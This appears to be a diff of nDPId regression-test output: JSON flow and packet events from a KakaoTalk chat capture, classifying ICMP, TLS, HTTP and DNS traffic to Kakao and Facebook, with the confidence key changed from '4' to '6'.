00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069030119,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":147,"pkt_l4_len":111,"thread_ts_msec":1430069030119,"pkt":"AAQCEgAAAAAAAAAAAAAIAEXAAIMZuAAAQAE5cQoYUrwKvL8BAwMj8wAAAABFAABn\/dEAADURYSMKvL8BChhSvAA17lMAUxMnuTqBgAABAAIAAAAACXBsdXMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAAA5UACgRwbHVzAmdswBbAMQABAAEAAADJAATSZ\/AP"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="} -00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1430069030703,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"thread_ts_msec":1430069030703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEBYBQANQAqICQnwAEAAAEAAAAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQAB"} 
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 
-01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 
+01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 
